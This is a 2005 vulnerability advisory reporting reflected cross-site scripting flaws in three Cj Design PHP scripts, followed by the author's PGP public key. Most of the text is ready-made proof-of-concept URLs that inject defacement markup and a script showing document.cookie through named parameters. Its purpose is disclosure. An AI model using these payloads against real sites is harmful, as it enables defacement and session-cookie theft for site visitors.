Cj Desing Three Aplications One Bug
######################################################################
[Psymera Advisory #1] CjTagBoard 3.0 - CjLinkOut 1.0 - CjWeb2Mail 3.0
######################################################################
Software: CjTagBoard
CjLinkOut
CjWeb2Mail
Versions: CjTagBoard =3.0
CjLinkOut =1.0
CjWeb2Mail =3.0
Language: PHP
Type: Cross Side Script
Risc: Low
Examples: A] CjTagBoard XSS
B] CjLinkOut XSS
C] CjWeb2Mail XSS
Exploitation: remote
Date: 07 Sep 2005
Vendor: Cj Desing
Page: http://www.cj-design.com/
Author: Psymera
e-mail: psymera@xxxxxxxxxxx
######################################################################
-----------------
A] CjTagBoard XSS
-----------------
http://[target]/[folder]/details.php?date=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/details.php?time=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/details.php?name=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/details.php?ip=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/details.php?agent=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/display.php?msg=<h1>DEFACED</h1><script>alert(document.cookie);</script>
----------------
B] CjLinkOut XSS
----------------
http://[target]/[folder]/top.php?123="><h1>hola</h1><script>alert(document.cookie);</script><
-----------------
C] CjWeb2Mail XSS
-----------------
http://[target]/[folder]/thankyou.php?name=<h1>Defaced</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/thankyou.php?sent=1&name=<h1>Defaced</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/thankyou.php?sent=1&message=<h1>Defaced</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/thankyou.php?sent=1&show_ip=yes&ip=<h1>deface</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/web2mail.php?error_messages=yes&emsg=<h1>Deface</h1><script>alert(document.cookie);</script>
#######################################################################
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP 8.0
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
=V+P0
-----END PGP PUBLIC KEY BLOCK-----